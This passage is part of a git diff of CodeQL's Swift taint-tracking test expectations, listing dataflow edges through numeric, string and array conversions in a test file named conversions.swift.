conversions.swift:114:7:114:7 | SSA def(q4) | +| conversions.swift:114:11:114:11 | SSA def(r4) | conversions.swift:116:12:116:12 | r4 | +| conversions.swift:114:11:114:11 | r4 | conversions.swift:114:11:114:11 | SSA def(r4) | +| conversions.swift:114:17:114:86 | call to quotientAndRemainder(dividingBy:) | conversions.swift:114:6:114:13 | (...) | +| conversions.swift:118:6:118:6 | SSA def(pair1) | conversions.swift:119:12:119:12 | pair1 | +| conversions.swift:118:6:118:6 | pair1 | conversions.swift:118:6:118:6 | SSA def(pair1) | +| conversions.swift:118:14:118:44 | call to addingReportingOverflow(_:) | conversions.swift:118:6:118:6 | pair1 | +| conversions.swift:119:12:119:12 | [post] pair1 | conversions.swift:120:12:120:12 | pair1 | +| conversions.swift:119:12:119:12 | pair1 | conversions.swift:120:12:120:12 | pair1 | +| conversions.swift:122:6:122:6 | SSA def(pair2) | conversions.swift:123:12:123:12 | pair2 | +| conversions.swift:122:6:122:6 | pair2 | conversions.swift:122:6:122:6 | SSA def(pair2) | +| conversions.swift:122:14:122:60 | call to addingReportingOverflow(_:) | conversions.swift:122:6:122:6 | pair2 | +| conversions.swift:123:12:123:12 | [post] pair2 | conversions.swift:124:12:124:12 | pair2 | +| conversions.swift:123:12:123:12 | pair2 | conversions.swift:124:12:124:12 | pair2 | +| conversions.swift:126:6:126:6 | SSA def(pair3) | conversions.swift:127:12:127:12 | pair3 | +| conversions.swift:126:6:126:6 | pair3 | conversions.swift:126:6:126:6 | SSA def(pair3) | +| conversions.swift:126:14:126:63 | call to addingReportingOverflow(_:) | conversions.swift:126:6:126:6 | pair3 | +| conversions.swift:127:12:127:12 | [post] pair3 | conversions.swift:128:12:128:12 | pair3 | +| conversions.swift:127:12:127:12 | pair3 | conversions.swift:128:12:128:12 | pair3 | +| conversions.swift:130:6:130:6 | SSA def(pair4) | conversions.swift:131:12:131:12 | pair4 | +| conversions.swift:130:6:130:6 | pair4 | conversions.swift:130:6:130:6 | SSA def(pair4) | +| conversions.swift:130:14:130:74 | call to addingReportingOverflow(_:) | conversions.swift:130:6:130:6 | pair4 | +| conversions.swift:131:12:131:12 | [post] pair4 | conversions.swift:132:12:132:12 | pair4 | +| conversions.swift:131:12:131:12 | pair4 | conversions.swift:132:12:132:12 | pair4 | +| conversions.swift:137:18:137:39 | call to sourceFloat(_:) | conversions.swift:137:12:137:40 | call to Float.init(_:) | +| conversions.swift:139:19:139:40 | call to sourceFloat(_:) | conversions.swift:139:12:139:41 | call to String.init(_:) | +| conversions.swift:140:12:140:41 | call to String.init(_:) | conversions.swift:140:12:140:43 | .utf8 | +| conversions.swift:140:19:140:40 | call to sourceFloat(_:) | conversions.swift:140:12:140:41 | call to String.init(_:) | +| conversions.swift:141:19:141:42 | call to sourceFloat80(_:) | conversions.swift:141:12:141:43 | call to String.init(_:) | +| conversions.swift:142:12:142:43 | call to String.init(_:) | conversions.swift:142:12:142:45 | .utf8 | +| conversions.swift:142:19:142:42 | call to sourceFloat80(_:) | conversions.swift:142:12:142:43 | call to String.init(_:) | +| conversions.swift:143:19:143:41 | call to sourceDouble(_:) | conversions.swift:143:12:143:42 | call to String.init(_:) | +| conversions.swift:144:12:144:42 | call to String.init(_:) | conversions.swift:144:12:144:44 | .utf8 | +| conversions.swift:144:19:144:41 | call to sourceDouble(_:) | conversions.swift:144:12:144:42 | call to String.init(_:) | +| conversions.swift:146:18:146:39 | call to sourceFloat(_:) | conversions.swift:146:12:146:40 | call to Float.init(_:) | +| conversions.swift:147:41:147:60 | call to sourceInt(_:) | conversions.swift:147:12:147:79 | call to Float.init(sign:exponent:significand:) | +| conversions.swift:147:76:147:76 | 0.0 | conversions.swift:147:12:147:79 | call to Float.init(sign:exponent:significand:) | +| conversions.swift:148:41:148:41 | 0 | conversions.swift:148:12:148:79 | call to Float.init(sign:exponent:significand:) | +| conversions.swift:148:57:148:78 | call to sourceFloat(_:) | conversions.swift:148:12:148:79 | call to Float.init(sign:exponent:significand:) | +| conversions.swift:149:63:149:63 | 0.0 | conversions.swift:149:12:149:66 | call to Float.init(signOf:magnitudeOf:) | +| conversions.swift:150:44:150:65 | call to sourceFloat(_:) | conversions.swift:150:12:150:66 | call to Float.init(signOf:magnitudeOf:) | +| conversions.swift:152:12:152:33 | call to sourceFloat(_:) | conversions.swift:152:12:152:35 | .exponent | +| conversions.swift:153:12:153:33 | call to sourceFloat(_:) | conversions.swift:153:12:153:35 | .significand | +| conversions.swift:154:12:154:35 | call to sourceFloat80(_:) | conversions.swift:154:12:154:37 | .exponent | +| conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | conversions.swift:155:12:155:37 | .significand | +| conversions.swift:156:12:156:34 | call to sourceDouble(_:) | conversions.swift:156:12:156:36 | .exponent | +| conversions.swift:157:12:157:34 | call to sourceDouble(_:) | conversions.swift:157:12:157:36 | .significand | +| conversions.swift:166:19:166:42 | call to sourceString(_:) | conversions.swift:166:12:166:43 | call to String.init(_:) | +| conversions.swift:168:6:168:6 | SSA def(ms1) | conversions.swift:169:12:169:12 | ms1 | +| conversions.swift:168:6:168:6 | ms1 | conversions.swift:168:6:168:6 | SSA def(ms1) | +| conversions.swift:168:12:168:26 | call to MyString.init(_:) | conversions.swift:168:12:168:27 | ...! | +| conversions.swift:168:12:168:27 | ...! | conversions.swift:168:6:168:6 | ms1 | +| conversions.swift:168:21:168:21 | abc | conversions.swift:168:12:168:26 | call to MyString.init(_:) | +| conversions.swift:169:12:169:12 | [post] ms1 | conversions.swift:170:12:170:12 | ms1 | +| conversions.swift:169:12:169:12 | ms1 | conversions.swift:170:12:170:12 | ms1 | +| conversions.swift:170:12:170:12 | [post] ms1 | conversions.swift:171:12:171:12 | ms1 | +| conversions.swift:170:12:170:12 | ms1 | conversions.swift:170:12:170:16 | .description | +| conversions.swift:170:12:170:12 | ms1 | conversions.swift:171:12:171:12 | ms1 | +| conversions.swift:171:12:171:12 | [post] ms1 | conversions.swift:172:12:172:12 | ms1 | +| conversions.swift:171:12:171:12 | ms1 | conversions.swift:171:12:171:16 | .debugDescription | +| conversions.swift:171:12:171:12 | ms1 | conversions.swift:172:12:172:12 | ms1 | +| conversions.swift:174:6:174:6 | SSA def(ms2) | conversions.swift:175:12:175:12 | ms2 | +| conversions.swift:174:6:174:6 | ms2 | conversions.swift:174:6:174:6 | SSA def(ms2) | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:174:12:174:46 | ...! | +| conversions.swift:174:12:174:46 | ...! | conversions.swift:174:6:174:6 | ms2 | +| conversions.swift:174:21:174:44 | call to sourceString(_:) | conversions.swift:174:12:174:45 | call to MyString.init(_:) | +| conversions.swift:175:12:175:12 | [post] ms2 | conversions.swift:176:12:176:12 | ms2 | +| conversions.swift:175:12:175:12 | ms2 | conversions.swift:176:12:176:12 | ms2 | +| conversions.swift:176:12:176:12 | [post] ms2 | conversions.swift:177:12:177:12 | ms2 | +| conversions.swift:176:12:176:12 | ms2 | conversions.swift:176:12:176:16 | .description | +| conversions.swift:176:12:176:12 | ms2 | conversions.swift:177:12:177:12 | ms2 | +| conversions.swift:177:12:177:12 | [post] ms2 | conversions.swift:178:12:178:12 | ms2 | +| conversions.swift:177:12:177:12 | ms2 | conversions.swift:177:12:177:16 | .debugDescription | +| conversions.swift:177:12:177:12 | ms2 | conversions.swift:178:12:178:12 | ms2 | +| conversions.swift:182:6:182:6 | SSA def(parent) | conversions.swift:183:12:183:12 | parent | +| conversions.swift:182:6:182:6 | parent | conversions.swift:182:6:182:6 | SSA def(parent) | +| conversions.swift:182:6:182:15 | ... as ... | conversions.swift:182:6:182:6 | parent | +| conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:182:6:182:15 | ... as ... | +| conversions.swift:183:12:183:12 | [post] parent | conversions.swift:184:12:184:12 | parent | +| conversions.swift:183:12:183:12 | parent | conversions.swift:184:12:184:12 | parent | +| conversions.swift:184:12:184:12 | [post] parent | conversions.swift:186:40:186:40 | parent | +| conversions.swift:184:12:184:12 | parent | conversions.swift:186:40:186:40 | parent | +| conversions.swift:186:6:186:6 | SSA def(v3) | conversions.swift:187:12:187:12 | v3 | +| conversions.swift:186:6:186:6 | v3 | conversions.swift:186:6:186:6 | SSA def(v3) | +| conversions.swift:186:6:186:10 | ... as ... | conversions.swift:186:6:186:6 | v3 | +| conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | conversions.swift:186:6:186:10 | ... as ... | +| conversions.swift:186:40:186:40 | parent | conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | +| conversions.swift:187:12:187:12 | [post] v3 | conversions.swift:188:12:188:12 | v3 | +| conversions.swift:187:12:187:12 | v3 | conversions.swift:188:12:188:12 | v3 | +| conversions.swift:199:7:199:7 | SSA def(self) | conversions.swift:199:7:199:7 | self[return] | +| conversions.swift:199:7:199:7 | self | conversions.swift:199:7:199:7 | SSA def(self) | +| conversions.swift:200:2:200:2 | SSA def(self) | conversions.swift:200:2:221:2 | self[return] | +| conversions.swift:200:2:200:2 | self | conversions.swift:200:2:200:2 | SSA def(self) | +| conversions.swift:201:7:201:7 | SSA def(arr1) | conversions.swift:203:13:203:13 | arr1 | +| conversions.swift:201:7:201:7 | arr1 | conversions.swift:201:7:201:7 | SSA def(arr1) | +| conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:201:7:201:7 | arr1 | +| conversions.swift:202:7:202:7 | SSA def(arr2) | conversions.swift:204:13:204:13 | arr2 | +| conversions.swift:202:7:202:7 | arr2 | conversions.swift:202:7:202:7 | SSA def(arr2) | +| conversions.swift:202:14:202:33 | [...] | conversions.swift:202:7:202:7 | arr2 | +| conversions.swift:203:13:203:13 | arr1 | conversions.swift:205:13:205:13 | arr1 | +| conversions.swift:204:13:204:13 | arr2 | conversions.swift:206:13:206:13 | arr2 | +| conversions.swift:205:13:205:13 | [post] arr1 | conversions.swift:208:25:208:25 | arr1 | +| conversions.swift:205:13:205:13 | arr1 | conversions.swift:205:13:205:19 | ...[...] | +| conversions.swift:205:13:205:13 | arr1 | conversions.swift:208:25:208:25 | arr1 | +| conversions.swift:206:13:206:13 | [post] arr2 | conversions.swift:209:25:209:25 | arr2 | +| conversions.swift:206:13:206:13 | arr2 | conversions.swift:206:13:206:19 | ...[...] | +| conversions.swift:206:13:206:13 | arr2 | conversions.swift:209:25:209:25 | arr2 | +| conversions.swift:208:7:208:7 | SSA def(arr1b) | conversions.swift:210:13:210:13 | arr1b | +| conversions.swift:208:7:208:7 | arr1b | conversions.swift:208:7:208:7 | SSA def(arr1b) | +| conversions.swift:208:15:208:29 | try ... | conversions.swift:208:7:208:7 | arr1b | +| conversions.swift:208:19:208:29 | call to Array.init(_:) | conversions.swift:208:15:208:29 | try ... | +| conversions.swift:208:25:208:25 | arr1 | conversions.swift:215:31:215:31 | arr1 | +| conversions.swift:209:7:209:7 | SSA def(arr2b) | conversions.swift:211:13:211:13 | arr2b | +| conversions.swift:209:7:209:7 | arr2b | conversions.swift:209:7:209:7 | SSA def(arr2b) | +| conversions.swift:209:15:209:29 | try ... | conversions.swift:209:7:209:7 | arr2b | +| conversions.swift:209:19:209:29 | call to Array.init(_:) | conversions.swift:209:15:209:29 | try ... | +| conversions.swift:209:25:209:25 | arr2 | conversions.swift:216:31:216:31 | arr2 | +| conversions.swift:210:13:210:13 | arr1b | conversions.swift:212:13:212:13 | arr1b | +| conversions.swift:211:13:211:13 | arr2b | conversions.swift:213:13:213:13 | arr2b | +| conversions.swift:212:13:212:13 | arr1b | conversions.swift:212:13:212:20 | ...[...] | +| conversions.swift:213:13:213:13 | arr2b | conversions.swift:213:13:213:20 | ...[...] | +| conversions.swift:215:7:215:7 | SSA def(arr1c) | conversions.swift:217:13:217:13 | arr1c | +| conversions.swift:215:7:215:7 | arr1c | conversions.swift:215:7:215:7 | SSA def(arr1c) | +| conversions.swift:215:15:215:35 | call to ContiguousArray.init(_:) | conversions.swift:215:7:215:7 | arr1c | +| conversions.swift:216:7:216:7 | SSA def(arr2c) | conversions.swift:218:13:218:13 | arr2c | +| conversions.swift:216:7:216:7 | arr2c | conversions.swift:216:7:216:7 | SSA def(arr2c) | +| conversions.swift:216:15:216:35 | call to ContiguousArray.init(_:) | conversions.swift:216:7:216:7 | arr2c | +| conversions.swift:217:13:217:13 | [post] arr1c | conversions.swift:219:13:219:13 | arr1c | +| conversions.swift:217:13:217:13 | arr1c | conversions.swift:219:13:219:13 | arr1c | +| conversions.swift:218:13:218:13 | [post] arr2c | conversions.swift:220:13:220:13 | arr2c | +| conversions.swift:218:13:218:13 | arr2c | conversions.swift:220:13:220:13 | arr2c | +| conversions.swift:219:13:219:13 | arr1c | conversions.swift:219:13:219:20 | ...[...] | +| conversions.swift:220:13:220:13 | arr2c | conversions.swift:220:13:220:20 | ...[...] | +| conversions.swift:226:7:226:7 | SSA def(self) | conversions.swift:226:7:226:7 | self[return] | +| conversions.swift:226:7:226:7 | self | conversions.swift:226:7:226:7 | SSA def(self) | +| conversions.swift:227:6:227:6 | self | conversions.swift:227:6:227:6 | SSA def(self) | +| conversions.swift:227:6:227:6 | self | conversions.swift:227:6:227:6 | SSA def(self) | +| conversions.swift:227:6:227:6 | self | conversions.swift:227:6:227:6 | SSA def(self) | +| conversions.swift:227:6:227:6 | value | conversions.swift:227:6:227:6 | SSA def(value) | +| conversions.swift:229:2:229:2 | SSA def(self) | conversions.swift:230:3:230:3 | self | +| conversions.swift:229:2:229:2 | self | conversions.swift:229:2:229:2 | SSA def(self) | +| conversions.swift:229:7:229:12 | SSA def(v) | conversions.swift:230:12:230:12 | v | +| conversions.swift:229:7:229:12 | v | conversions.swift:229:7:229:12 | SSA def(v) | +| conversions.swift:230:3:230:3 | [post] self | conversions.swift:229:2:231:2 | self[return] | +| conversions.swift:230:3:230:3 | self | conversions.swift:229:2:231:2 | self[return] | +| conversions.swift:235:7:235:17 | SSA def(withUInt) | conversions.swift:236:13:236:13 | withUInt | +| conversions.swift:235:7:235:17 | withUInt | conversions.swift:235:7:235:17 | SSA def(withUInt) | +| conversions.swift:236:13:236:13 | [post] withUInt | conversions.swift:237:14:237:14 | withUInt | +| conversions.swift:236:13:236:13 | withUInt | conversions.swift:237:14:237:14 | withUInt | +| conversions.swift:237:3:237:22 | SSA def(self) | conversions.swift:238:12:238:12 | self | +| conversions.swift:237:10:237:22 | call to Self.init(_:) | conversions.swift:237:3:237:22 | SSA def(self) | +| conversions.swift:238:12:238:12 | [post] self | conversions.swift:235:2:239:2 | self[return] | +| conversions.swift:238:12:238:12 | self | conversions.swift:235:2:239:2 | self[return] | +| conversions.swift:241:7:241:20 | SSA def(withMyValue) | conversions.swift:242:13:242:13 | withMyValue | +| conversions.swift:241:7:241:20 | withMyValue | conversions.swift:241:7:241:20 | SSA def(withMyValue) | +| conversions.swift:242:13:242:13 | [post] withMyValue | conversions.swift:243:10:243:10 | withMyValue | +| conversions.swift:242:13:242:13 | withMyValue | conversions.swift:243:10:243:10 | withMyValue | +| conversions.swift:243:3:243:22 | SSA def(self) | conversions.swift:244:12:244:12 | self | +| conversions.swift:244:12:244:12 | [post] self | conversions.swift:241:2:245:2 | self[return] | +| conversions.swift:244:12:244:12 | self | conversions.swift:241:2:245:2 | self[return] | +| conversions.swift:247:7:247:21 | SSA def(withMyValue2) | conversions.swift:248:13:248:13 | withMyValue2 | +| conversions.swift:247:7:247:21 | withMyValue2 | conversions.swift:247:7:247:21 | SSA def(withMyValue2) | +| conversions.swift:248:13:248:13 | [post] withMyValue2 | conversions.swift:249:11:249:11 | withMyValue2 | +| conversions.swift:248:13:248:13 | withMyValue2 | conversions.swift:249:11:249:11 | withMyValue2 | +| conversions.swift:249:7:249:7 | SSA def(x) | conversions.swift:250:10:250:10 | x | +| conversions.swift:249:7:249:7 | x | conversions.swift:249:7:249:7 | SSA def(x) | +| conversions.swift:249:11:249:24 | .v | conversions.swift:249:7:249:7 | x | +| conversions.swift:250:3:250:10 | SSA def(self) | conversions.swift:251:12:251:12 | self | +| conversions.swift:250:10:250:10 | x | conversions.swift:250:3:250:10 | SSA def(self) | +| conversions.swift:251:12:251:12 | [post] self | conversions.swift:247:2:252:2 | self[return] | +| conversions.swift:251:12:251:12 | self | conversions.swift:247:2:252:2 | self[return] | +| conversions.swift:254:14:254:14 | SSA def(self) | conversions.swift:254:2:257:2 | self[return] | +| conversions.swift:254:14:254:14 | self | conversions.swift:254:14:254:14 | SSA def(self) | +| conversions.swift:254:20:254:33 | SSA def(withMyValue) | conversions.swift:255:13:255:13 | withMyValue | +| conversions.swift:254:20:254:33 | withMyValue | conversions.swift:254:20:254:33 | SSA def(withMyValue) | +| conversions.swift:255:13:255:13 | [post] withMyValue | conversions.swift:256:10:256:10 | withMyValue | +| conversions.swift:255:13:255:13 | withMyValue | conversions.swift:256:10:256:10 | withMyValue | | simple.swift:12:13:12:13 | 1 | simple.swift:12:13:12:24 | ... .+(_:_:) ... | | simple.swift:12:17:12:24 | call to source() | simple.swift:12:13:12:24 | ... .+(_:_:) ... | | simple.swift:13:13:13:20 | call to source() | simple.swift:13:13:13:24 | ... .+(_:_:) ... | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected index 38d1de0167e..e7dc06ad325 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected @@ -1,131 +1,138 @@ edges -| conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Float.init(_:) | provenance | | -| conversions.swift:36:19:36:38 | call to sourceInt(_:) | conversions.swift:36:12:36:39 | call to String.init(_:) | provenance | | -| conversions.swift:37:12:37:39 | call to String.init(_:) | conversions.swift:37:12:37:41 | .utf8 | provenance | | -| conversions.swift:37:19:37:38 | call to sourceInt(_:) | conversions.swift:37:12:37:39 | call to String.init(_:) | provenance | | -| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:40:12:40:12 | arr | provenance | | -| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:41:12:41:12 | arr [Collection element] | provenance | | -| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:42:20:42:20 | arr [Collection element] | provenance | | -| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:43:20:43:20 | arr [Collection element] | provenance | | -| conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:39:12:39:39 | [...] [Collection element] | provenance | | -| conversions.swift:41:12:41:12 | arr [Collection element] | conversions.swift:41:12:41:17 | ...[...] | provenance | | -| conversions.swift:42:20:42:20 | arr [Collection element] | conversions.swift:42:12:42:23 | call to Array.init(_:) | provenance | | -| conversions.swift:43:12:43:23 | call to Array.init(_:) [Collection element] | conversions.swift:43:12:43:26 | ...[...] | provenance | | -| conversions.swift:43:20:43:20 | arr [Collection element] | conversions.swift:43:12:43:23 | call to Array.init(_:) [Collection element] | provenance | | -| conversions.swift:44:20:44:42 | call to sourceString(_:) | conversions.swift:44:20:44:44 | .utf8 | provenance | | -| conversions.swift:44:20:44:44 | .utf8 | conversions.swift:44:12:44:48 | call to Array.init(_:) | provenance | | -| conversions.swift:45:12:45:48 | call to Array.init(_:) [Collection element] | conversions.swift:45:12:45:51 | ...[...] | provenance | | -| conversions.swift:45:20:45:42 | call to sourceString(_:) | conversions.swift:45:20:45:44 | .utf8 | provenance | | -| conversions.swift:45:20:45:44 | .utf8 | conversions.swift:45:12:45:48 | call to Array.init(_:) [Collection element] | provenance | | -| conversions.swift:47:13:47:32 | call to sourceInt(_:) | conversions.swift:48:13:48:13 | v | provenance | | -| conversions.swift:51:18:51:50 | call to numericCast(_:) | conversions.swift:52:12:52:12 | v2 | provenance | | -| conversions.swift:51:30:51:49 | call to sourceInt(_:) | conversions.swift:51:18:51:50 | call to numericCast(_:) | provenance | | -| conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | conversions.swift:55:12:55:12 | v4 | provenance | | -| conversions.swift:54:31:54:50 | call to sourceInt(_:) | conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | provenance | | -| conversions.swift:63:11:63:35 | call to abs(_:) | conversions.swift:64:12:64:12 | v7 | provenance | | -| conversions.swift:63:15:63:34 | call to sourceInt(_:) | conversions.swift:63:11:63:35 | call to abs(_:) | provenance | | -| conversions.swift:75:12:75:50 | call to Self.init(_:radix:) [some:0] | conversions.swift:75:12:75:51 | ...! | provenance | | -| conversions.swift:75:16:75:38 | call to sourceString(_:) | conversions.swift:75:12:75:50 | call to Self.init(_:radix:) [some:0] | provenance | | -| conversions.swift:77:30:77:49 | call to sourceInt(_:) | conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | provenance | | -| conversions.swift:78:27:78:46 | call to sourceInt(_:) | conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | provenance | | -| conversions.swift:79:12:79:31 | call to sourceInt(_:) | conversions.swift:79:12:79:33 | .littleEndian | provenance | | -| conversions.swift:80:12:80:31 | call to sourceInt(_:) | conversions.swift:80:12:80:33 | .bigEndian | provenance | | -| conversions.swift:109:18:109:39 | call to sourceFloat(_:) | conversions.swift:109:12:109:40 | call to Float.init(_:) | provenance | | -| conversions.swift:111:19:111:40 | call to sourceFloat(_:) | conversions.swift:111:12:111:41 | call to String.init(_:) | provenance | | -| conversions.swift:112:12:112:41 | call to String.init(_:) | conversions.swift:112:12:112:43 | .utf8 | provenance | | -| conversions.swift:112:19:112:40 | call to sourceFloat(_:) | conversions.swift:112:12:112:41 | call to String.init(_:) | provenance | | -| conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | conversions.swift:113:12:113:43 | call to String.init(_:) | provenance | | -| conversions.swift:114:12:114:43 | call to String.init(_:) | conversions.swift:114:12:114:45 | .utf8 | provenance | | -| conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | conversions.swift:114:12:114:43 | call to String.init(_:) | provenance | | -| conversions.swift:115:19:115:41 | call to sourceDouble(_:) | conversions.swift:115:12:115:42 | call to String.init(_:) | provenance | | -| conversions.swift:116:12:116:42 | call to String.init(_:) | conversions.swift:116:12:116:44 | .utf8 | provenance | | -| conversions.swift:116:19:116:41 | call to sourceDouble(_:) | conversions.swift:116:12:116:42 | call to String.init(_:) | provenance | | -| conversions.swift:118:18:118:39 | call to sourceFloat(_:) | conversions.swift:118:12:118:40 | call to Float.init(_:) | provenance | | -| conversions.swift:119:41:119:60 | call to sourceInt(_:) | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | provenance | | -| conversions.swift:120:57:120:78 | call to sourceFloat(_:) | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | provenance | | -| conversions.swift:122:44:122:65 | call to sourceFloat(_:) | conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | provenance | | -| conversions.swift:124:12:124:33 | call to sourceFloat(_:) | conversions.swift:124:12:124:35 | .exponent | provenance | | -| conversions.swift:125:12:125:33 | call to sourceFloat(_:) | conversions.swift:125:12:125:35 | .significand | provenance | | -| conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | conversions.swift:126:12:126:37 | .exponent | provenance | | -| conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | conversions.swift:127:12:127:37 | .significand | provenance | | -| conversions.swift:128:12:128:34 | call to sourceDouble(_:) | conversions.swift:128:12:128:36 | .exponent | provenance | | -| conversions.swift:129:12:129:34 | call to sourceDouble(_:) | conversions.swift:129:12:129:36 | .significand | provenance | | -| conversions.swift:136:19:136:42 | call to sourceString(_:) | conversions.swift:136:12:136:43 | call to String.init(_:) | provenance | | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:144:12:144:45 | call to MyString.init(_:) [some:0] | provenance | | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:145:12:145:12 | ms2 | provenance | | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:146:12:146:16 | .description | provenance | | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:147:12:147:16 | .debugDescription | provenance | | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) [some:0] | conversions.swift:144:12:144:46 | ...! | provenance | | -| conversions.swift:144:12:144:46 | ...! | conversions.swift:145:12:145:12 | ms2 | provenance | | -| conversions.swift:144:12:144:46 | ...! | conversions.swift:146:12:146:16 | .description | provenance | | -| conversions.swift:144:12:144:46 | ...! | conversions.swift:147:12:147:16 | .debugDescription | provenance | | -| conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:144:12:144:45 | call to MyString.init(_:) | provenance | | -| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:153:12:153:12 | parent | provenance | | -| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:154:12:154:12 | parent | provenance | | -| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:156:40:156:40 | parent | provenance | | -| conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:157:12:157:12 | v3 | provenance | | -| conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:158:12:158:12 | v3 | provenance | | -| conversions.swift:156:40:156:40 | parent | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | provenance | | -| conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:173:13:173:13 | arr1 | provenance | | -| conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:175:13:175:19 | ...[...] | provenance | | -| conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:178:25:178:25 | arr1 | provenance | | -| conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:185:31:185:31 | arr1 | provenance | | -| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:174:13:174:13 | arr2 | provenance | | -| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:176:13:176:13 | arr2 [Collection element] | provenance | | -| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:179:25:179:25 | arr2 [Collection element] | provenance | | -| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:186:31:186:31 | arr2 [Collection element] | provenance | | -| conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:172:14:172:33 | [...] [Collection element] | provenance | | -| conversions.swift:176:13:176:13 | arr2 [Collection element] | conversions.swift:176:13:176:19 | ...[...] | provenance | | -| conversions.swift:178:19:178:29 | call to Array.init(_:) [Collection element] | conversions.swift:180:13:180:13 | arr1b | provenance | | -| conversions.swift:178:19:178:29 | call to Array.init(_:) [Collection element] | conversions.swift:182:13:182:13 | arr1b [Collection element] | provenance | | -| conversions.swift:178:25:178:25 | arr1 | conversions.swift:178:19:178:29 | call to Array.init(_:) [Collection element] | provenance | | -| conversions.swift:179:19:179:29 | call to Array.init(_:) [Collection element] | conversions.swift:181:13:181:13 | arr2b | provenance | | -| conversions.swift:179:19:179:29 | call to Array.init(_:) [Collection element] | conversions.swift:183:13:183:13 | arr2b [Collection element] | provenance | | -| conversions.swift:179:25:179:25 | arr2 [Collection element] | conversions.swift:179:19:179:29 | call to Array.init(_:) [Collection element] | provenance | | -| conversions.swift:182:13:182:13 | arr1b [Collection element] | conversions.swift:182:13:182:20 | ...[...] | provenance | | -| conversions.swift:183:13:183:13 | arr2b [Collection element] | conversions.swift:183:13:183:20 | ...[...] | provenance | | -| conversions.swift:185:15:185:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:187:13:187:13 | arr1c | provenance | | -| conversions.swift:185:15:185:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:189:13:189:13 | arr1c [Collection element] | provenance | | -| conversions.swift:185:31:185:31 | arr1 | conversions.swift:185:15:185:35 | call to ContiguousArray.init(_:) [Collection element] | provenance | | -| conversions.swift:186:15:186:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:188:13:188:13 | arr2c | provenance | | -| conversions.swift:186:15:186:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:190:13:190:13 | arr2c [Collection element] | provenance | | -| conversions.swift:186:31:186:31 | arr2 [Collection element] | conversions.swift:186:15:186:35 | call to ContiguousArray.init(_:) [Collection element] | provenance | | -| conversions.swift:189:13:189:13 | arr1c [Collection element] | conversions.swift:189:13:189:20 | ...[...] | provenance | | -| conversions.swift:190:13:190:13 | arr2c [Collection element] | conversions.swift:190:13:190:20 | ...[...] | provenance | | -| conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | self [v] | provenance | | -| conversions.swift:199:7:199:12 | v | conversions.swift:200:12:200:12 | v | provenance | | -| conversions.swift:200:3:200:3 | [post] self [v] | conversions.swift:199:2:201:2 | self[return] [v] | provenance | | -| conversions.swift:200:12:200:12 | v | conversions.swift:200:3:200:3 | [post] self [v] | provenance | | -| conversions.swift:205:7:205:17 | withUInt | conversions.swift:206:13:206:13 | withUInt | provenance | | -| conversions.swift:211:7:211:20 | withMyValue [v] | conversions.swift:212:13:212:13 | withMyValue [v] | provenance | | -| conversions.swift:212:13:212:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | -| conversions.swift:212:13:212:13 | withMyValue [v] | conversions.swift:212:13:212:25 | .v | provenance | | -| conversions.swift:217:7:217:21 | withMyValue2 [v] | conversions.swift:218:13:218:13 | withMyValue2 [v] | provenance | | -| conversions.swift:217:7:217:21 | withMyValue2 [v] | conversions.swift:219:11:219:11 | withMyValue2 [v] | provenance | | -| conversions.swift:218:13:218:13 | withMyValue2 [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | -| conversions.swift:218:13:218:13 | withMyValue2 [v] | 